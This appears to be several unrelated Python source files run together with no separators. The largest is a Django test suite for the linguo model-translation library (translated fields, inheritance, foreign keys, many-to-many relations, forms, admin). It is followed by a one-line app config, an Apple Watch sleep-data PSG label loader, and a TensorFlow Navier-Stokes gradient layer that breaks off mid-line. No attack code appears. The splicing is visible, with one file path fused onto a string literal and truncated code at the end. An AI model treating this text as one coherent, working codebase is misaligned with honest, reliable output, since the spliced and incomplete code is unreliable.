FooRel.objects.filter(myfoo__name_fr='French Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_fr__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) def testModelWithTranslatableFileField(self): doc = Doc.objects.create(pdf='something.pdf') doc.translate(pdf='something-fr.pdf', language='fr') doc.save() translation.activate('en') self.assertEqual(Doc.objects.get().pdf.url, 'something.pdf') translation.activate('fr') self.assertEqual(Doc.objects.get().pdf.url, 'something-fr.pdf') def testModelWithAFieldCalledLanguageThatIsNotTranslatable(self): lan = Lan.objects.create(name='Test en', language='en') lan.translate(name='Test fr', language='fr') lan.save() translation.activate('en') self.assertEqual(Lan.objects.get().name, 'Test en') self.assertEqual(Lan.objects.get().language, 'en') translation.activate('fr') self.assertEqual(Lan.objects.get().name, 'Test fr') self.assertEqual(Lan.objects.get().language, 'en') class InheritanceTests(LinguoTests): def testOrderingOfFieldsWithinModel(self): expected = ['id', 'price', 'name', 'name_fr', 'foo_ptr', 'quantity', 'description', 'description_fr'] for i in range(len(Bar._meta.fields)): self.assertEqual(Bar._meta.fields[i].name, expected[i]) def testCreation(self): translation.activate('en') obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj = Bar.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'test') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) translation.activate('fr') Bar.objects.create(name='FrenchBar', description='test in french', price=7, quantity=5) translation.activate('en') self.assertEquals(Bar.objects.count(), 2) def testTranslate(self): """ We should be able to create a translation of an object. """ obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') obj.save() # Refresh from db obj = Bar.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'test') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.description, 'test FR') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) def testDelayedCreation(self): obj = Bar() obj.name = 'Bar' obj.description = 'Some desc' obj.price = 9 obj.quantity = 2 translation.activate('fr') obj.name = 'BarFr' obj.description = 'Some desc fr' obj.save() translation.activate('en') obj = Bar.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'Some desc') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.description, 'Some desc fr') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) def testSwitchingActiveLanguageSetValuesOnTranslatedFields(self): obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') translation.activate('fr') self.assertEquals(obj.name, 'BarFr') obj.name = 'NewBarFr' translation.activate('en') self.assertEquals(obj.name, 'Bar') obj.save() # Refresh from db obj = Foo.objects.get(id=obj.id) self.assertEquals(obj.name, 'Bar') translation.activate('fr') self.assertEquals(obj.name, 'NewBarFr') def testCreateTranslationWithNewValueForNonTransField(self): """ That value of non-trans fields should be the same for all translations. """ obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', price=20, quantity=40, language='fr') translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.description, 'test FR') self.assertEquals(obj.price, 20) self.assertEquals(obj.quantity, 40) translation.activate('en') self.assertEquals(obj.price, 20) self.assertEquals(obj.quantity, 40) # Ensure no other fields were changed self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'test') def testQuerysetUpdate(self): obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') obj.save() obj2 = Bar.objects.create(name='Bar2', description='bar desc', price=13, quantity=5) obj2.translate(name='Bar2Fr', description='test2 FR', language='fr') obj2.save() qs = Bar.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewBar', quantity=99) # Refresh objects from db obj = Bar.objects.get(pk=obj.pk) obj2 = Bar.objects.get(pk=obj2.pk) self.assertEquals(obj.name, 'NewBar') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'NewBar') self.assertEquals(obj2.quantity, 99) translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'Bar2Fr') self.assertEquals(obj2.quantity, 99) def testQuerysetUpdateInOtherLanguageSetsValuesOnOtherLanguageOnly(self): obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') obj.save() obj2 = Bar.objects.create(name='Bar2', description='bar desc', price=13, quantity=5) obj2.translate(name='Bar2Fr', description='test2 FR', language='fr') obj2.save() translation.activate('fr') qs = Bar.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewBarFr', quantity=99) # Refresh objects from db obj = Bar.objects.get(pk=obj.pk) obj2 = Bar.objects.get(pk=obj2.pk) self.assertEquals(obj.name, 'NewBarFr') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'NewBarFr') self.assertEquals(obj2.quantity, 99) translation.activate('en') self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'Bar2') self.assertEquals(obj2.quantity, 99) def testUniqueTogether(self): """ Ensure that the unique_together definitions in child is working. """ Moo.objects.create(name='Moo', price=3, q1=4) try: Moo.objects.create(name='Moo2', price=15, q1=4) except IntegrityError: pass else: self.fail() def testUniqueTogetherInParent(self): """ Ensure that the unique_together definitions in parent is working. """ Moo.objects.create(name='Moo', price=3, q1=4) try: Moo.objects.create(name='Moo', price=3, q1=88) except IntegrityError: pass else: self.fail() def testFilteringOnTransField(self): obj = Bar.objects.create(name='English Bar', description='English test', price=9, quantity=2) obj.translate(name='French Bar', description='French test', language='fr') obj.save() qs = Bar.objects.filter(name="English Bar") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.filter(name__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.exclude(name__startswith="English") self.assertEquals(qs.count(), 0) translation.activate('fr') qs = Bar.objects.filter(name="French Bar") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.filter(name__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.exclude(name__startswith="French") self.assertEquals(qs.count(), 0) def testOrderingOnTransField(self): obj = Bar.objects.create(name='English Bar', description='English test', price=9, quantity=2) obj.translate(name='French Bar', description='French test', language='fr') obj.save() obj2 = Bar.objects.create(name='Another English Bar', description='another english test', price=22, quantity=25) obj2.translate(name='Another French Bar', description='another french test', language='fr') obj2.save() qs = Bar.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) translation.activate('fr') qs = Bar.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) self.assertEquals(qs[1].name, 'French Bar') def testDefaultOrderingIsTransAndInheritedTransField(self): """ Test a model that has an inherited trans field in the default ordering. """ o1 = Ord.objects.create(name='B2 test', price=1) o1.translate(name='B2 test F', price=1, language='fr') o1.save() o2 = Ord.objects.create(name='A1 test', price=2, last_name='Appleseed') o2.translate(name='C3 test F', price=2, last_name='Charlie', language='fr') o2.save() o2b = Ord.objects.create(name='A1 test', price=3, last_name='Zoltan') o2b.translate(name='C3 test F', price=3, last_name='Bobby', language='fr') o2b.save() o3 = Ord.objects.create(name='C3 foo', price=4) o3.translate(name='A1 test F', price=4, language='fr') o3.save() qs_en = Ord.objects.all() self.assertEquals(qs_en[0], o2) self.assertEquals(qs_en[1], o2b) self.assertEquals(qs_en[2], o1) self.assertEquals(qs_en[3], o3) translation.activate('fr') qs_fr = Ord.objects.all() self.assertEquals(qs_fr[0], o3) self.assertEquals(qs_fr[1], o1) self.assertEquals(qs_fr[2], o2b) self.assertEquals(qs_fr[3], o2) def testFilteringOnRelatedObjectsTransField(self): obj = Bar.objects.create(name='English Bar', description='English test', price=9, quantity=2) obj.translate(name='French Bar', description='French test', language='fr') obj.save() obj2 = Bar.objects.create(name='Another English Bar', description='another english test', price=22, quantity=25) obj2.translate(name='Another French Bar', description='another french test', language='fr') obj2.save() m1 = BarRel.objects.create(mybar=obj, desc="description 1") m2 = BarRel.objects.create(mybar=obj2, desc="description 2") qs = BarRel.objects.filter(mybar__name='Another English Bar') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = BarRel.objects.filter(mybar__name__startswith='English') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) translation.activate('fr') qs = BarRel.objects.filter(mybar__name='Another French Bar') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = BarRel.objects.filter(mybar__name__startswith='French') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) def testExtendingAbstract(self): """ Test a model that extends an abstract model an defines a new non trans field. """ obj = Moe.objects.create(name='test', description='test description', price=5, quantity=3 ) obj.translate(language='fr', name='test-fr', description='test description fr' ) obj.save() obj = Moe.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'test') self.assertEquals(obj.description, 'test description') self.assertEquals(obj.price, 5) self.assertEquals(obj.quantity, 3) Moe.objects.create(name='Other', description='test other', price=15, quantity=13) self.assertEquals(Moe.objects.count(), 2) translation.activate('fr') self.assertEquals(obj.name, 'test-fr') self.assertEquals(obj.description, 'test description fr') self.assertEquals(obj.price, 5) self.assertEquals(obj.quantity, 3) def testExtendingAbstractKeepsNonTransFields(self): obj = Moe.objects.create( name='test', description='test description', price=5, quantity=3 ) obj.translate(language='fr', name='test-fr', description='test description fr', price=13 # Changing price ) obj.quantity = 99 # Changing quantity obj.save() obj = Moe.objects.get(pk=obj.pk) self.assertEquals(obj.price, 13) self.assertEquals(obj.quantity, 99) obj.price = 66 obj.quantity = 77 obj.save() translation.activate('fr') self.assertEquals(obj.price, 66) self.assertEquals(obj.quantity, 77) class ForeignKeyTests(LinguoTests): def testModelWithFK(self): """ A trans model has a foreign key to another trans model. The foreign key is not language specific. """ obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') rel1.save() rel2 = Gem.objects.create(somefoo=obj2, gemtype='a') self.assertEquals(rel1.somefoo, obj) # Ensure the reverse manager returns expected results self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) translation.activate('fr') self.assertEquals(rel1.somefoo, obj) self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) translation.activate('en') self.assertEquals(rel2.somefoo, obj2) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel2) def testChangeFKWithInTranslatedLanguage(self): obj = Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') rel1.save() translation.activate('fr') rel1.somefoo = obj2 rel1.save() translation.activate('en') rel2 = Gem.objects.create(somefoo=obj2, gemtype='a') rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj2) self.assertEquals(rel2.somefoo, obj2) self.assertEquals(obj2.gem_set.count(), 2) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) self.assertEquals(obj2.gem_set.order_by('id')[1], rel2) translation.activate('fr') self.assertEquals(obj2.gem_set.count(), 2) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) self.assertEquals(obj2.gem_set.order_by('id')[1], rel2) self.assertEquals(obj.gem_set.count(), 0) def testRemoveFk(self): """ Test for consistency when you remove a foreign key connection. """ obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj2 = Foo.objects.create(name='Another English Foo', price=12) rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') rel1.somefoo = None rel1.save() rel2 = Gem.objects.create(somefoo=obj2, gemtype='a') translation.activate('fr') self.assertEquals(rel1.somefoo, None) self.assertEquals(rel2.somefoo, obj2) self.assertEquals(obj.gem_set.count(), 0) self.assertEquals(obj2.gem_set.count(), 1) def testFKReverseCreation(self): """ Test creating an object using the reverse manager. """ Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = obj2.gem_set.create(gemtype='a') obj2 = Foo.objects.get(pk=obj2.pk) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) translation.activate('fr') self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) def testFKReverseAddition(self): """ Test adding an object using the reverse manager. """ obj = Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') obj2.gem_set.add(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj2) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel1) def testFKReverseRemoval(self): """ Test removing an object using the reverse manager. """ obj = Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') obj2.gem_set.add(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj2) self.assertEquals(obj.gem_set.count(), 0) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel1) translation.activate('fr') self.assertEquals(rel1.somefoo, obj2) self.assertEquals(obj.gem_set.count(), 0) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel1) translation.activate('en') obj2.gem_set.remove(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, None) self.assertEquals(obj2.gem_set.count(), 0) translation.activate('fr') self.assertEquals(rel1.somefoo, None) self.assertEquals(obj2.gem_set.count(), 0) def testSetFKInTranslatedLanguage(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() translation.activate('fr') rel1 = Gem.objects.create(gemtype='a', somefoo=obj) translation.activate('en') self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) def testFKReverseAdditionOnTranslatedLanguage(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() rel1 = Gem.objects.create(gemtype='a') translation.activate('fr') obj.gem_set.add(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj) self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) class ManyToManyTests(LinguoTests): def testCreateM2M(self): obj = Foo.objects.create(name='English Foo', price=10) cat = obj.categories.create(name='C1') cat2 = FooCategory.objects.create(name='C2') self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat) obj.translate(language='fr', name='French Foo') obj.save() translation.activate('fr') self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat) # Reverse lookup should return only foo self.assertEquals(cat.foo_set.count(), 1) self.assertEquals(cat.foo_set.all()[0], obj) translation.activate('en') cat.translate(language='fr', name='C1 fr') cat.save() translation.activate('fr') self.assertEquals(cat.foo_set.all()[0], obj) translation.activate('en') obj2 = Foo.objects.create(name='Another Foo', price=5) self.assertEquals(obj2.categories.count(), 0) self.assertEquals(cat.foo_set.count(), 1) self.assertEquals(cat.foo_set.all()[0], obj) self.assertEquals(cat2.foo_set.count(), 0) def testRemovingM2M(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(language='fr', name='French Foo') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) cat = obj.categories.create(name='C1') cat2 = obj2.categories.create(name='C2') translation.activate('fr') cat3 = obj.categories.create(name='C3') translation.activate('en') self.assertEquals(obj.categories.count(), 2) translation.activate('fr') self.assertEquals(obj.categories.count(), 2) obj.categories.remove(cat) self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat3) translation.activate('en') self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat3) self.assertEquals(obj2.categories.count(), 1) self.assertEquals(obj2.categories.all()[0], cat2) self.assertEquals(cat2.foo_set.all()[0], obj2) def testClearingM2M(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(language='fr', name='French Foo') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.save() obj.categories.create(name='C1') cat2 = obj2.categories.create(name='C2') translation.activate('fr') obj.categories.create(name='C3') self.assertEquals(obj.categories.count(), 2) translation.activate('fr') self.assertEquals(obj.categories.count(), 2) obj.categories.clear() self.assertEquals(obj.categories.count(), 0) translation.activate('en') self.assertEquals(obj.categories.count(), 0) self.assertEquals(obj2.categories.count(), 1) self.assertEquals(obj2.categories.all()[0], cat2) self.assertEquals(cat2.foo_set.all()[0], obj2) class FormTests(LinguoTests): def testModelForm(self): form = BarForm() self.assertEqual(len(form.fields), 7) self.assertTrue('name' in form.fields) self.assertTrue('name_fr' in form.fields) self.assertTrue('price' in form.fields) self.assertTrue('categories' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) self.assertTrue('description_fr' in form.fields) data = {'name': 'Test', 'name_fr': 'French Test', 'price': 13, 'quantity': 3, 'description': 'This is a test', 'description_fr': 'French Description', } form = BarForm(data=data) self.assertEqual(unicode(form['name'].label), u'Name') self.assertEqual(unicode(form['name_fr'].label), u'Name (French)') self.assertEqual(unicode(form['description'].label), u'Description') self.assertEqual(unicode(form['description_fr'].label), u'Description (French)') bar = form.save() self.assertEqual(bar.name, 'Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'This is a test') translation.activate('fr') self.assertEqual(bar.name, 'French Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'French Description') translation.activate('en') # Create the form with an instance data2 = {'name': 'Changed', 'name_fr': 'Changed French', 'price': 43, 'quantity': 22, 'description': 'Changed description', 'description_fr': 'Changed description French' } form = BarForm(instance=bar, data=data2) bar = form.save() self.assertEqual(bar.name, 'Changed') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description') translation.activate('fr') self.assertEqual(bar.name, 'Changed French') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description French') def testModelFormInSecondaryLanguage(self): translation.activate('fr') form = BarForm() # When we are in French name and description point to French fields (not the English) # name_fr and description_fr are actually redundant # But we want name_fr and description_fr to take precedence over name and description data = {'name': 'Test', 'name_fr': 'French Test', 'price': 13, 'quantity': 3, 'description': 'This is a test', 'description_fr': 'French Description', } form = BarForm(data=data) # These translations are not meant to be correct it is solely for the purpose of testing self.assertEqual(unicode(form['name'].label), u'Neom') self.assertEqual(unicode(form['name_fr'].label), u'Neom (Français)') self.assertEqual(unicode(form['description'].label), u'Description') # This does not get translated because Django generates the verbose_name as a string self.assertEqual(unicode(form['description_fr'].label), u'Déscriptione (Français)') bar = form.save() translation.activate('en') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, '') translation.activate('fr') self.assertEqual(bar.name, 'French Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'French Description') def testModelFormWithFieldsSpecified(self): form = BarFormWithFieldsSpecified() self.assertEqual(len(form.fields), 4) self.assertTrue('name' in form.fields) self.assertTrue('price' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) data = {'name': 'Test', 'price': 13, 'quantity': 3, 'description': 'This is a test', } form = BarFormWithFieldsSpecified(data=data) bar = form.save() self.assertEqual(bar.name, 'Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'This is a test') translation.activate('fr') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, '') translation.activate('en') # Create the form with an instance data2 = {'name': 'Changed', 'price': 43, 'quantity': 22, 'description': 'Changed description', } form = BarFormWithFieldsSpecified(instance=bar, data=data2) bar = form.save() self.assertEqual(bar.name, 'Changed') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description') translation.activate('fr') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, '') def testModelFormWithFieldsSpecifiedInSecondaryLanguage(self): translation.activate('fr') form = BarFormWithFieldsSpecified() self.assertEqual(len(form.fields), 4) self.assertTrue('name' in form.fields) self.assertTrue('price' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) data = {'name': '', 'price': 13, 'quantity': 3, 'description': 'This is a French test', } form = BarFormWithFieldsSpecified(data=data) bar = form.save() self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'This is a French test') translation.activate('en') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, '') translation.activate('fr') # Create the form with an instance data2 = {'name': 'Changed', 'price': 43, 'quantity': 22, 'description': 'Changed description', } form = BarFormWithFieldsSpecified(instance=bar, data=data2) bar = form.save() self.assertEqual(bar.name, 'Changed') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description') translation.activate('en') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, '') if django.VERSION[:3] >= (1, 1, 2): # The AdminTests only pass with django >= 1.1.2 (but compatibility is django >= 1.0.3) class AdminTests(LinguoTests): def setUp(self): super(AdminTests, self).setUp() self.user = User.objects.create_user(username='test', password='', email='' ) self.user.is_staff = True self.user.is_superuser = True self.user.save() self.client.login(username='test', password='') def testAdminChangelistFeatures(self): # Create some Bar objects b1 = Bar.objects.create(name="apple", price=2, description="hello world", quantity=1) b1.translate(name="pomme", description="allo monde", language="fr") b1.save() b2 = Bar.objects.create(name="computer", price=3, description="oh my god", quantity=3) b2.translate(name="ordinator", description="oh mon dieu", language="fr") b2.save() url = reverse('admin:tests_bar_changelist') response = self.client.get(url) # Check that the correct language is being displayed self.assertContains(response, 'hello world') self.assertContains(response, 'oh my god') # Check the list filters self.assertContains(response, '?name=apple') self.assertContains(response, '?name=computer') # Check that the filtering works response = self.client.get(url, {'name': 'computer'}) self.assertContains(response, 'oh my god') self.assertNotContains(response, 'hello world') # Check the searching response = self.client.get(url, {'q': 'world'}) self.assertContains(response, 'hello world') self.assertNotContains(response, 'oh my god') def testAdminAddSubmission(self): url = reverse('admin:tests_bar_add') response = self.client.post(url, data={ 'name': 'Bar', 'name_fr': 'French Bar', 'price': 12, 'quantity': 5, 'description': 'English description.', 'description_fr': 'French description.' }) self.assertEqual(response.status_code, 302) def testAdminChangeSubmission(self): obj = Bar(name='Bar', price=12, quantity=5, description='Hello') obj.translate(language='fr', name='French Bar', description='French Hello') obj.save() url = reverse('admin:tests_bar_change', args=[obj.id]) response = self.client.post(url, data={ 'name': 'Bar2', 'name_fr': 'French Bar2', 'price': 222, 'quantity': 55, 'description': 'Hello2', 'description_fr': 'French Hello2' }) self.assertEqual(response.status_code, 302) class TestMultilingualForm(LinguoTests): def testCreatesModelInstanceWithAllFieldValues(self): translation.activate('fr') form = MultilingualBarFormAllFields(data={ 'name': 'Bar', 'name_fr': 'French Bar', 'price': 12, 'quantity': 5, 'description': 'English description.', 'description_fr': 'French description.' }) instance = form.save() translation.activate('en') instance = Bar.objects.get(id=instance.id) # Refresh from db self.assertEqual(instance.name, 'Bar') self.assertEqual(instance.price, 12) self.assertEqual(instance.quantity, 5) self.assertEqual(instance.description, 'English description.') translation.activate('fr') self.assertEqual(instance.name, 'French Bar') self.assertEqual(instance.price, 12) self.assertEqual(instance.quantity, 5) self.assertEqual(instance.description, 'French description.') def testUpdatesModelInstanceWithAllFieldValues(self): instance = Bar(name='Bar', price=12, quantity=5, description='Hello') instance.translate(language='fr', name='French Bar', description='French Hello') instance.save() translation.activate('fr') form = MultilingualBarFormAllFields(instance=instance, data={ 'name': 'Bar2', 'name_fr': 'French Bar2', 'price': 222, 'quantity': 55, 'description': 'Hello2', 'description_fr': 'French Hello2' }) instance = form.save() translation.activate('en') instance = Bar.objects.get(id=instance.id) # Refresh from db self.assertEqual(instance.name, 'Bar2') self.assertEqual(instance.price, 222) self.assertEqual(instance.quantity, 55) self.assertEqual(instance.description, 'Hello2') translation.activate('fr') self.assertEqual(instance.name, 'French Bar2') self.assertEqual(instance.price, 222) self.assertEqual(instance.quantity, 55) self.assertEqual(instance.description, 'French Hello2') def testInitialDataContainsAllFieldValues(self): instance = Bar(name='Bar', price=12, quantity=5, description='Hello') instance.translate(language='fr', name='French Bar', description='French Hello') instance.save() translation.activate('fr') form = MultilingualBarFormAllFields(instance=instance) self.assertEqual(form.initial['name'], 'Bar') self.assertEqual(form.initial['name_fr'], 'French Bar') self.assertEqual(form.initial['price'], 12) self.assertEqual(form.initial['quantity'], 5) self.assertEqual(form.initial['description'], 'Hello') self.assertEqual(form.initial['description_fr'], 'French Hello') class TestsForUnupportedFeatures(object): # LinguoTests): def testTransFieldHasNotNullConstraint(self): """ Test a trans model with a trans field that has a not null constraint. """ pass def testExtendingToMakeTranslatable(self): """ Test the ability to extend a non-translatable model with MultilingualModel in order to make some field translatable. """ pass def testSubclassingAbstractModelIntoTranslatableModel(self): """ Test the ability to subclass a a non-translatable Abstract model and extend with MultilingualModel in order to make some field translatable. """ pass def testModelFormWithFieldsExcluded(self): form = BarFormWithFieldsExcluded() self.assertEqual(len(form.fields), 4) self.assertTrue('price' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) self.assertTrue('description_fr' in form.fields) def testAdminChangelistFeaturesInSecondaryLanguage(self): # Create some Bar objects b1 = Bar.objects.create(name="apple", price=2, description="hello world", quantity=1) b1.translate(name="pomme", description="allo monde", language="fr") b1.save() b2 = Bar.objects.create(name="computer", price=3, description="oh my god", quantity=3) b2.translate(name="ordinator", description="oh mon dieu", language="fr") b2.save() translation.activate('fr') url = reverse('admin:tests_bar_changelist') response = self.client.get(url) # Check that the correct language is being displayed self.assertContains(response, 'allo monde') self.assertContains(response, 'oh mon dieu') self.assertNotContains(response, 'hello world') self.assertNotContains(response, 'oh my god') # Check the list filters self.assertContains(response, '?name=pomme') self.assertContains(response, '?name=ordinator') # Check that the filtering works response = self.client.get(url, {'name': 'ordinator'}) self.assertContains(response, 'oh mon dieu') self.assertNotContains(response, 'allo monde') # Check the searching response = self.client.get(url, {'q': 'monde'}) self.assertContains(response, 'allo monde') self.assertNotContains(response, 'oh mon dieu') default_app_config = 'polyline.apps.PolylineConfig'applewatch_dataprocessing/source/preprocessing/psg/psg_label_service.py import numpy as np import pandas as pd from source.constants import Constants from source.preprocessing.psg.psg_service import PSGService class PSGLabelService(object): @staticmethod def load(subject_id): psg_label_path = PSGLabelService.get_path(subject_id) feature = pd.read_csv(str(psg_label_path)).values return feature @staticmethod def get_path(subject_id): return Constants.FEATURE_FILE_PATH.joinpath(subject_id + '_psg_labels.out') @staticmethod def build(subject_id, valid_epochs): psg_array = PSGService.load_cropped_array(subject_id) labels = [] idx = psg_array[:, 0] original_labels = [] for epoch in valid_epochs: value = np.interp(epoch.timestamp, psg_array[:, 0], psg_array[:, 1]) labels.append(value) original_labels.append(psg_array[:, 1][[np.where(idx == epoch.timestamp)[0]]][0]) assert np.abs(np.asarray(labels)-np.asarray(original_labels)).sum() == 0, \ print("Label interpolation error") return np.array(labels) @staticmethod def write(subject_id, labels): psg_labels_path = PSGLabelService.get_path(subject_id) np.savetxt(psg_labels_path, labels, fmt='%f') import tensorflow as tf class GradientLayer(tf.keras.layers.Layer): """ Custom layer to compute derivatives for the steady Navier-Stokes equation. Attributes: model: keras network model. """ def __init__(self, model, **kwargs): """ Args: model: keras network model. """ self.model = model super().__init__(**kwargs) def call(self, xy): """ Computing derivatives for the steady Navier-Stokes equation. Args: xy: input variable. Returns: psi: stream function. p_grads: pressure and its gradients. u_grads: u and its gradients. v_grads: v and its gradients. """ x, y = [ xy[..., i, tf.newaxis] for i in range(xy.shape[-1]) ] with tf.GradientTape(persistent=True) as ggg: ggg.watch(x) ggg.watch(y) with tf.GradientTape(persistent=True) as gg: gg.watch(x) gg.watch(y) with tf.GradientTape(persistent=True) as g: g.watch(x) g.watch(y) psi_p = self.model(tf.concat([x, y], axis=-1)) psi = psi_p[..., 0, tf.newaxis] p = psi_p[..., 1, tf.newaxis] u = g.batch_jacobian(psi, y)[..., 0] v = 